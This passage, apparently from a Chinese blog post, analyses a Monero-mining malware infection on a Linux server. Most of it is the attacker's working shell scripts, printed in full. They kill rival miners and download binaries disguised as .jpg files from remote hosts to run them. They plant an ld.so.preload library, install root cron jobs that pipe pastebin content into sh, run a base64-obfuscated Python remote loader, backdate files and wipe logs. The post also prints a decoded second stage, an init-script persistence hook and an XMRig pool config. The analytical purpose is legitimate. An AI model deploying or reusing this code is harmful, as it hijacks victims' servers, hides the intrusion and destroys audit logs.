pkill -f sourplum
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9
pkill -f biosetjenkins
pkill -f AnXqV.yam
pkill -f xmrigDaemon
pkill -f xmrigMiner
pkill -f xmrig
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f bashx
pkill -f bashg
pkill -f bashe
pkill -f bashf
pkill -f bashh
pkill -f XbashY
pkill -f libapache
rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
rm -rf /tmp/conns
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -f /tmp/irq
rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json
netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 5.196.225.222 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
y=$(ps aux | grep -v grep | grep kworkerds | wc -l )
if [ ${y} -eq 0 ];then
	netstat -anp | grep 13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
fi
}

function system() {
	if [ ! -f "/bin/httpdns" ]; then
		curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns
		if [ ! -f "/bin/httpdns" ]; then
			wget  https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns
		fi
		sed -i '$d' /etc/crontab && echo -e "* */6 * * * root /bin/sh /bin/httpdns" >> /etc/crontab
	fi
		
}

function top() {
	if [ ! -f "/usr/local/lib/libntp.so" ]; then
		curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
		if [ ! -f "/usr/local/lib/libntp.so" ]; then
			wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
		fi
	fi
	if [ ! -f "/etc/ld.so.preload" ]; then
		echo /usr/local/lib/libntp.so > /etc/ld.so.preload
	else
		sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libntp.so >> /etc/ld.so.preload
	fi
	touch -acmr /bin/sh /etc/ld.so.preload
	touch -acmr /bin/sh /usr/local/lib/libjdk.so
	touch -acmr /bin/sh /usr/local/lib/libntp.so
	echo 0>/var/spool/mail/root
	echo 0>/var/log/wtmp
	echo 0>/var/log/secure
	echo 0>/var/log/cron
}

function python() {
	nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
	touch /tmp/.tmpa
}

function echocron() {
	echo -e "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /etc/cron.d/root
	echo -e "*/30 * * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/root
	mkdir -p /var/spool/cron/crontabs
	echo -e "* */10 * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/crontabs/root
	touch -acmr /bin/sh /etc/cron.d/root
	touch -acmr /bin/sh /var/spool/cron/crontabs
	touch -acmr /bin/sh /var/spool/cron/root
	touch -acmr /bin/sh /var/spool/cron/crontabs/root
}

function downloadrun() {
	ps=$(netstat -anp | grep 13531 | wc -l)
	if [ ${ps} -eq 0 ];then
		if [ ! -f "/tmp/kworkerds" ]; then
			curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
			if [ ! -f "/tmp/kworkerds" ]; then
				wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
			fi
				nohup /tmp/kworkerds >/dev/null 2>&1 &
		else
			nohup /tmp/kworkerds >/dev/null 2>&1 &
		fi
	fi
}

function downloadrunxm() {
	pm=$(netstat -anp | grep 13531 | wc -l)
	if [ ${pm} -eq 0 ];then
		if [ ! -f "/bin/config.json" ]; then
			curl -fsSL http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
			if [ ! -f "/bin/config.json" ]; then
				wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
			fi
		fi
		if [ ! -f "/bin/kworkerds" ]; then
			curl -fsSL http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
			if [ ! -f "/bin/kworkerds" ]; then
				wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
			fi
				nohup /bin/kworkerds >/dev/null 2>&1 &
		else
			nohup /bin/kworkerds >/dev/null 2>&1 &
		fi
	fi
}

update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH )
if [ ${update}x = "update"x ];then
	rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
	echocron
else
	if [ ! -f "/tmp/.tmpa" ]; then
		rm -rf /tmp/.tmp
		python
	fi
	kills
	downloadrun
	echocron
	system
	top
	sleep 10
	port=$(netstat -anp | grep 13531 | wc -l)
	if [ ${port} -eq 0 ];then
		downloadrunxm
	fi
fi
#
#

  这个shell就比较复杂了,一个一个来分析吧,从上到下看看他封装的shell方法吧

  • kills
      找到一堆进程并杀掉
  • system
      把的https://pastebin.com/raw/698D7kZU内容/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/kDSLjxfQ|/usr/bin/base64 -d|/bin/bash保存到 /bin/httpdns 文件并给他赋权限
    https://pastebin.com/raw/kDSLjxfQ 又是一个base64 `
IyEvYmluL3NoClNIRUxMPS9iaW4vc2gKUEFUSD0vdXNyL2xvY2FsL3NiaW46L3Vzci9sb2NhbC9iaW46L3NiaW46L2JpbjovdXNyL3NiaW46L3Vzci9iaW4KCmZ1bmN0aW9uIGRvd25sb2FkcnVuKCkgewoJcHM9JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cHN9IC1lcSAwIF07dGhlbgoJCWlmIFsgISAtZiAiL3RtcC9rd29ya2VyZHMiIF07IHRoZW4KCQkJY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cDovL3RoeXJzaS5jb20vdDYvMzU4LzE1MzQ0OTUxMjd4LTE0MDQ3NjQyNDcuanBnIC1vIC90bXAva3dvcmtlcmRzICYmIGNobW9kICt4IC90bXAva3dvcmtlcmRzCgkJCWlmIFsgISAtZiAiL3RtcC9rd29ya2VyZHMiIF07IHRoZW4KCQkJCXdnZXQgaHR0cDovL3RoeXJzaS5jb20vdDYvMzU4LzE1MzQ0OTUxMjd4LTE0MDQ3NjQyNDcuanBnIC1PIC90bXAva3dvcmtlcmRzICYmIGNobW9kICt4IC90bXAva3dvcmtlcmRzCgkJCWZpCgkJCQlub2h1cCAvdG1wL2t3b3JrZXJkcyA+L2Rldi9udWxsIDI+JjEgJgoJCWVsc2UKCQkJbm9odXAgL3RtcC9rd29ya2VyZHMgPi9kZXYvbnVsbCAyPiYxICYKCQlmaQoJZmkKfQoKZnVuY3Rpb24gZG93bmxvYWRydW54bSgpIHsKCXBtPSQobmV0c3RhdCAtYW5wIHwgZ3JlcCAxMzUzMSB8IHdjIC1sKQoJaWYgWyAke3BtfSAtZXEgMCBdO3RoZW4KCQlpZiBbICEgLWYgIi9iaW4vY29uZmlnLmpzb24iIF07IHRoZW4KCQkJY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cDovL3RoeXJzaS5jb20vdDYvMzU4LzE1MzQ0OTYwMjJ4LTE0MDQ3NjQ1ODMuanBnIC1vIC9iaW4vY29uZmlnLmpzb24gJiYgY2htb2QgK3ggL2Jpbi9jb25maWcuanNvbgoJCQlpZiBbICEgLWYgIi9iaW4vY29uZmlnLmpzb24iIF07IHRoZW4KCQkJCXdnZXQgaHR0cDovL3RoeXJzaS5jb20vdDYvMzU4LzE1MzQ0OTYwMjJ4LTE0MDQ3NjQ1ODMuanBnIC1PIC9iaW4vY29uZmlnLmpzb24gJiYgY2htb2QgK3ggL2Jpbi9jb25maWcuanNvbgoJCQlmaQoJCWZpCgkJaWYgWyAhIC1mICIvYmluL2t3b3JrZXJkcyIgXTsgdGhlbgoJCQljdXJsIC1mc1NMIC0tY29ubmVjdC10aW1lb3V0IDEyMCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5MTc5OHgtMTQwNDc2NDQyMC5qcGcgLW8gL2Jpbi9rd29ya2VyZHMgJiYgY2htb2QgK3ggL2Jpbi9rd29ya2VyZHMKCQkJaWYgWyAhIC1mICIvYmluL2t3b3JrZXJkcyIgXTsgdGhlbgoJCQkJd2dldCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5MTc5OHgtMTQwNDc2NDQyMC5qcGcgLU8gL2Jpbi9rd29ya2VyZHMgJiYgY2htb2QgK3ggL2Jpbi9rd29ya2VyZHMKCQkJZmkKCQkJCW5vaHVwIC9iaW4va3dvcmtlcmRzID4vZGV2L251bGwgMj4mMSAmCgkJZWxzZQoJCQlub2h1cCAvYmluL2t3b3JrZXJkcyA+L2Rldi9udWxsIDI+JjEgJgoJCWZpCglmaQp9CgpmdW5jdGlvbiBpbml0KCkgewoJaWYgWyAhIC1mICIvdXNyL3NiaW4va3dvcmtlciIgXTsgdGhlbgoJCWN1cmwgLWZzU0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHA6Ly90aHlyc2kuY29tL3Q2LzM2Mi8xNTM1MTc1MDE1eC0xNDA0ODE3ODgwLmpwZyAtbyAvdXNyL3NiaW4va3dvcmtlciAmJiBjaG1vZCA3NzcgL3Vzci9zYmluL2t3b3JrZXIKCQlpZiBbICEgLWYgIi91c3Ivc2Jpbi9rd29ya2VyIiBdOyB0aGVuCgkJCXdnZXQgaHR0cDovL3RoeXJzaS5jb20vdDYvMzYyLzE1MzUxNzUwMTV4LTE0MDQ4MTc4ODAuanBnIC1PIC91c3Ivc2Jpbi9rd29ya2VyICYmIGNobW9kIDc3NyAvdXNyL3NiaW4va3dvcmtlcgoJCWZpCglmaQoJaWYgWyAhIC1mICIvZXRjL2luaXQuZC9rd29ya2VyIiBdOyB0aGVuCgkJY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cDovL3RoeXJzaS5jb20vdDYvMzYyLzE1MzUxNzUzNDN4LTE1NjY2NTc2NzUuanBnIC1vIC9ldGMvaW5pdC5kL2t3b3JrZXIgJiYgY2htb2QgNzc3IC9ldGMvaW5pdC5kL2t3b3JrZXIKCQlpZiBbICEgLWYgIi9ldGMvaW5pdC5kL2t3b3JrZXIiIF07IHRoZW4KCQkJd2dldCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNjIvMTUzNTE3NTM0M3gtMTU2NjY1NzY3NS5qcGcgLU8gL2V0Yy9pbml0LmQva3dvcmtlciAmJiBjaG1vZCA3NzcgL2V0Yy9pbml0LmQva3dvcmtlcgoJCWZpCglmaQoJY2hrY29uZmlnIC0tYWRkIGt3b3JrZXIKfQoKZnVuY3Rpb24gZWNob2Nyb24oKSB7CgllY2hvIC1lICIqLzEwICogKiAqICogcm9vdCAvdXNyL2Jpbi9jdXJsIGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy94Ylk3cDVUYnxzaFxuIyMiID4gL2V0Yy9jcm9uLmQvcm9vdAoJZWNobyAtZSAiKi8zMCAqICogKiAqCS91c3IvYmluL2N1cmwgLWZzU0wgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hiWTdwNVRifHNoXG4jIyIgPiAvdmFyL3Nwb29sL2Nyb24vcm9vdAoJbWtkaXIgLXAgL3Zhci9zcG9vbC9jcm9uL2Nyb250YWJzCgllY2hvIC1lICIqICovMTAgKiAqICoJL3Vzci9iaW4vY3VybCAtZnNTTCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcveGJZN3A1VGJ8c2hcbiMjIiA+IC92YXIvc3Bvb2wvY3Jvbi9jcm9udGFicy9yb290Cn0KCgp1cGRhdGU9JCggY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0M0WmhRRnJIICkKaWYgWyAke3VwZGF0ZX14ID0gInVwZGF0ZSJ4IF07dGhlbgoJcm0gLXJmIC90bXAvbG9jayogL2Jpbi9rd29ya2VyZHMgL2Jpbi9jb25maWcuanNvbiAvdG1wL2t3b3JrZXJkcyAvcm9vdC9rd29ya2VyZHMKCWVjaG9jcm9uCmVsc2UKCWRvd25sb2FkcnVuCglpbml0CgllY2hvY3JvbgoJc2xlZXAgMTAKCXBvcnQ9JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cG9ydH0gLWVxIDAgXTt0aGVuCgkJZG93bmxvYWRydW54bQoJZmkKZmkKIwoj
```&emsp;&emsp;解码之后是 
```shell
#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
function downloadrun() {
	ps=$(netstat -anp | grep 13531 | wc -l)
	if [ ${ps} -eq 0 ];then
		if [ ! -f "/tmp/kworkerds" ]; then
			curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
			if [ ! -f "/tmp/kworkerds" ]; then
				wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
			fi
				nohup /tmp/kworkerds >/dev/null 2>&1 &
		else
			nohup /tmp/kworkerds >/dev/null 2>&1 &
		fi
	fi
}

function downloadrunxm() {
	pm=$(netstat -anp | grep 13531 | wc -l)
	if [ ${pm} -eq 0 ];then
		if [ ! -f "/bin/config.json" ]; then
			curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
			if [ ! -f "/bin/config.json" ]; then
				wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
			fi
		fi
		if [ ! -f "/bin/kworkerds" ]; then
			curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
			if [ ! -f "/bin/kworkerds" ]; then
				wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
			fi
				nohup /bin/kworkerds >/dev/null 2>&1 &
		else
			nohup /bin/kworkerds >/dev/null 2>&1 &
		fi
	fi
}

function init() {
	if [ ! -f "/usr/sbin/kworker" ]; then
		curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -o /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
		if [ ! -f "/usr/sbin/kworker" ]; then
			wget http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -O /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
		fi
	fi
	if [ ! -f "/etc/init.d/kworker" ]; then
		curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -o /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
		if [ ! -f "/etc/init.d/kworker" ]; then
			wget http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -O /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
		fi
	fi
	chkconfig --add kworker
}

function echocron() {
	echo -e "*/10 * * * * root /usr/bin/curl https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /etc/cron.d/root
	echo -e "*/30 * * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/root
	mkdir -p /var/spool/cron/crontabs
	echo -e "* */10 * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/crontabs/root
}


update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH )
if [ ${update}x = "update"x ];then
	rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
	echocron
else
	downloadrun
	init
	echocron
	sleep 10
	port=$(netstat -anp | grep 13531 | wc -l)
	if [ ${port} -eq 0 ];then
		downloadrunxm
	fi
fi
#
#

这个等会再分析

  • top
      把这个http://thyrsi.com/t6/365/1535595427x-1404817712.jpg图片保存到服务器的/usr/local/lib/libntp.so(同事保存到/etc/ld.so.preload)并赋权限,这个看似一个图片其实应该是个动态链接库具体有什么作用还不太清楚,但是凭感觉没有干什么好事,然后把他刚创建的这几个文件 /etc/ld.so.preload``/usr/local/lib/libjdk.so``/usr/local/lib/libntp.so的修改时间变得和/bin/sh一样(真是大大的坏)
  • python
      
    后台运行python程序 python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))"这个就是最开始查到的python进程(原来是在这被启动的)
  • echocron
      
    把类似这样的定时任务写到了三个crontabs的配置文件里面"*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##"分别是 /etc/cron.d/root /var/spool/cron/root /var/spool/cron/crontabs/root, 同样把他们的修改时间变得和/bin/sh一样
  • downloadrun
      
    http://thyrsi.com/t6/358/1534495127x-1404764247.jpg的内容保存到/tmp/kworkerds并赋权限 然后后台执行 /tmp/kworkerds 这个应该是个可执行文件 但是不是一个shell,但是干掉一个也不是什么好事
  • downloadrunxm
      
    http://thyrsi.com/t6/358/1534496022x-1404764583.jpg的内容保存到/bin/config.json并赋权限,这是一个json
{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "av": 0,
    "background": false,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": null,
    "donate-level": 0,
    "huge-pages": true,
    "hw-aes": null,
    "log-file": null,
    "max-cpu-usage": 100,
    "pools": [
        {
            "url": "stratum+tcp://xmr.f2pool.com:13531",
            "user": "47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.xmrig",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": false,
            "variant": 1
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "threads": null,
    "user-agent": null,
    "watch": false
}

  没有看到哪里使用了,但是应该是和之前的动态链接库和可执行文件有关,同时把http://thyrsi.com/t6/358/1534491798x-1404764420.jpg的内容保存到/bin/kworkerds并赋权限,然后后台执行 /tmp/kworkerds

  • 分析这个shell脚本
      脚本封装的一些方法基本分析完了,看看这个脚本干了什么事情:先kills杀掉一堆进程,然后downloadrun下载一个可执行文件并后台运行,再echocron写了一堆定时任务,再system下载了动态链接库,然后top下载一个动态链接库并同步到/etc/ld.so.preload植入了预加载型恶意动态链接库后门,休息10sdownloadrunxm下载config.json,下载可执行文件/bin/kworkerds并后台运行

  • 这个shell分析完了再看看system方法里面出现的那个shell

#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

function downloadrun() {
	ps=$(netstat -anp | grep 13531 | wc -l)
	if [ ${ps} -eq 0 ];then
		if [ ! -f "/tmp/kworkerds" ]; then
			curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
			if [ ! -f "/tmp/kworkerds" ]; then
				wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
			fi
				nohup /tmp/kworkerds >/dev/null 2>&1 &
		else
			nohup /tmp/kworkerds >/dev/null 2>&1 &
		fi
	fi
}

function downloadrunxm() {
	pm=$(netstat -anp | grep 13531 | wc -l)
	if [ ${pm} -eq 0 ];then
		if [ ! -f "/bin/config.json" ]; then
			curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
			if [ ! -f "/bin/config.json" ]; then
				wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
			fi
		fi
		if [ ! -f "/bin/kworkerds" ]; then
			curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
			if [ ! -f "/bin/kworkerds" ]; then
				wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
			fi
				nohup /bin/kworkerds >/dev/null 2>&1 &
		else
			nohup /bin/kworkerds >/dev/null 2>&1 &
		fi
	fi
}

function init() {
	if [ ! -f "/usr/sbin/kworker" ]; then
		curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -o /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
		if [ ! -f "/usr/sbin/kworker" ]; then
			wget http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -O /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
		fi
	fi
	if [ ! -f "/etc/init.d/kworker" ]; then
		curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -o /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
		if [ ! -f "/etc/init.d/kworker" ]; then
			wget http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -O /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
		fi
	fi
	chkconfig --add kworker
}

function echocron() {
	echo -e "*/10 * * * * root /usr/bin/curl https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /etc/cron.d/root
	echo -e "*/30 * * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/root
	mkdir -p /var/spool/cron/crontabs
	echo -e "* */10 * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/crontabs/root
}


update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH )
if [ ${update}x = "update"x ];then
	rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
	echocron
else
	downloadrun
	init
	echocron
	sleep 10
	port=$(netstat -anp | grep 13531 | wc -l)
	if [ ${port} -eq 0 ];then
		downloadrunxm
	fi
fi
#
#

  这个shell和之前那个shell很相似很多方法重复了,但是也有一些变化,同样先看看他的方法

downloadrun

  http://thyrsi.com/t6/358/1534495127x-1404764247.jpg的内容保存到/tmp/kworkerds并赋权限然后后台执行 /tmp/kworkerds

downloadrunxm

  把http://thyrsi.com/t6/358/1534496022x-1404764583.jpg的内容保存到/bin/config.json并赋权限,这是一个json 同时把http://thyrsi.com/t6/358/1534491798x-1404764420.jpg的内容保存到/bin/kworkerds并赋权限,然后后台执行 /tmp/kworkerds

echocron

  到处写定时任务

init

  这个方法之前没有,把http://thyrsi.com/t6/362/1535175015x-1404817880.jpg的内容保存到/usr/sbin/kworker并赋权限,这也是一个可执行文件,把http://thyrsi.com/t6/362/1535175343x-1566657675.jpg的内容保存到/etc/init.d/kworker并赋权限,这也是一个shell脚本是kworker的脚本chkconfig --add kworker添加开机自启

#! /bin/bash
#chkconfig: - 99 01
#description: kworker daemon
#processname: /usr/sbin/kworker
### BEGIN INIT INFO
# Provides:	/user/sbin/kworker
# Required-Start:
# Required-Stop:
# Default-Start:	2 3 4 5
# Default-Stop:		0 1 6
# Short-Description: kworker deamon
# Description:		kworker deamon
### END INIT INFO

LocalPath="/usr/sbin/kworker"
name='kworker'
pid_file="/var/run/$name.pid"
stdout_log="/var/log/$name.log"
stderr_log="/var/log/$name.err"
get_pid(){
    cat "$pid_file"
}
is_running(){
    [ -f "$pid_file" ] &&/usr/sbin/kworker -Pid $(get_pid) > /dev/null 2>&1
}
case "$1" in
start)
    if is_running; then
        echo "Already started"
    else
        echo "Starting $name"
        $LocalPath >>"$stdout_log" 2>> "$stderr_log" &
        echo $! > "$pid_file"
        if ! is_running; then
        echo "Unable to start, see$stdout_log and $stderr_log"
        exit 1
        fi
    fi
;;
stop)
    if is_running; then
        echo -n "Stopping$name.."
        kill $(get_pid)
        for i in {1..10}
        do
            if ! is_running; then
                break
            fi
            echo -n "."
            sleep 1
        done
        echo
        if is_running; then
            echo "Not stopped; maystill be shutting down or shutdown may have failed"
            exit 1
        else
            echo "Stopped"
            if [ -f "$pid_file"]; then
                rm "$pid_file"
            fi
        fi
    else
        echo "Not running"
    fi
;;
restart)
    $0 stop
    if is_running; then
        echo "Unable to stop, will notattempt to start"
        exit 1
    fi
    $0 start
;;
status)
    if is_running; then
        echo "Running"
    else
        echo "Stopped"
        exit 1
    fi
;;
*)
echo "Usage: $0{start|stop|restart|status}"
exit 1
;;
esac
exit 0

  方法分析完了分析一下这个shell:就是downloadrun下载可执行文件/tmp/kworkerds并后台运行然后init下载并配置kworkerd开机自启之后echocron在三个地方配置定时任务sleep 10休息10sdownloadrunxm下载/bin/config.json并下载可执行文件/tmp/kworkerds后台运行

4.感想

